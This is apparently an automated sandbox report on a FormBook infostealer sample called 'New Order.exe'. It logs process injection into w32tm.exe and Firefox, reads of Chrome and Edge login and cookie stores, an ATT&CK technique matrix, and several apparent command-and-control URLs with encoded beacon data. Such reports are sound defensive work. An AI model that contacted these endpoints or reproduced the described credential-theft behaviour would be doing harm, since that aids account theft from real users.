                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Users\user\Desktop\New Order.exe; Memory written: C:\Users\user\Desktop\New Order.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\New Order.exe; Section loaded: NULL target: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\New Order.exe; Section loaded: NULL target: C:\Windows\SysWOW64\w32tm.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\w32tm.exe; Section loaded: NULL target: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe protection: read write
                Source: C:\Windows\SysWOW64\w32tm.exe; Section loaded: NULL target: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\w32tm.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\w32tm.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\w32tm.exe; Thread register set: target process: 1708
                Source: C:\Windows\SysWOW64\w32tm.exe; Thread APC queued: target process: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                Source: C:\Users\user\Desktop\New Order.exe; Process created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; Process created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"
                Source: C:\Windows\SysWOW64\w32tm.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: XVZmwHdSYwx.exe, 0000000D.00000002.4633352473.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000000.2407699735.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000000.2558639122.00000000014C0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: IProgram Manager
                Source: XVZmwHdSYwx.exe, 0000000D.00000002.4633352473.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000000.2407699735.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000000.2558639122.00000000014C0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: XVZmwHdSYwx.exe, 0000000D.00000002.4633352473.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000000.2407699735.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000000.2558639122.00000000014C0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: XVZmwHdSYwx.exe, 0000000D.00000002.4633352473.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000000.2407699735.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000000.2558639122.00000000014C0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New Order.exe; Queries volume information: C:\Users\user\Desktop\New Order.exe VolumeInformation
                Source: C:\Users\user\Desktop\New Order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Order.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\New Order.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\Desktop\New Order.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 8.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 8.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\w32tm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\w32tm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\w32tm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\w32tm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\w32tm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\w32tm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\w32tm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\w32tm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\w32tm.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 8.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 8.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                11
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                [Behavior graph: ID 1567406, Sample: New Order.exe, Startdate: 03/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                New Order.exe | 58% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                New Order.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                Name | Malicious | Antivirus Detection | Reputation
                                                        unknown
                                                        http://www.aiactor.xyz/ni8v/?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.614genetics.online/n3sn/?u6nP_F48=RfKXbkttwVfKfWhPTrA3UJfHAa0lqotu1/Ih4u/jCz+IVopDYjbPUryKgNOP1Jh4fKEyHC4SaeJpkkGXoxNgwDh8y8hzLkYWybtZWLt0K3r82a9qd0enmdThBea8SuX4gW/lNzc=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.funnystory.online/plyd/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE=true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.614genetics.online/n3sn/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.funnystory.online/plyd/true
                                                        • Avira URL Cloud: safe
                                                        unknown
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                            www.717hy.netUnited States
                                                                                                                            55293A2HOSTINGUStrue
                                                                                                                            173.236.199.97
                                                                                                                            www.kvsj.netUnited States
                                                                                                                            26347DREAMHOST-ASUStrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567406
Start date and time: 2024-12-03 14:36:48 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: New Order.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@12/7@20/13
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 75%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 93%
                                                                                                                            • Number of executed functions: 94
                                                                                                                            • Number of non-executed functions: 290
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.190.147.3, 20.190.177.20, 20.190.177.84, 20.190.147.11, 20.190.147.12, 20.190.177.83, 20.190.177.23, 20.190.177.85
                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, login.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: New Order.exe
Time      Type             Description
08:37:43  API Interceptor  1x Sleep call for process: New Order.exe modified
08:37:45  API Interceptor  17x Sleep call for process: powershell.exe modified
08:38:53  API Interceptor  8619528x Sleep call for process: w32tm.exe modified
                                                                                                                            Product24573.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            Siirtokuitti_006703.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            P5348574_74676.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            Product7825.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\Desktop\New Order.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:true
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1172
                                                                                                                            Entropy (8bit):5.354777075714867
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                                            MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                                                                                                                            SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                                                                                                                            SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                                                                                                                            SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                            Process:C:\Windows\SysWOW64\w32tm.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):196608
                                                                                                                            Entropy (8bit):1.1239949490932863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                            MD5:271D5F995996735B01672CF227C81C17
                                                                                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                            Malicious:false
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
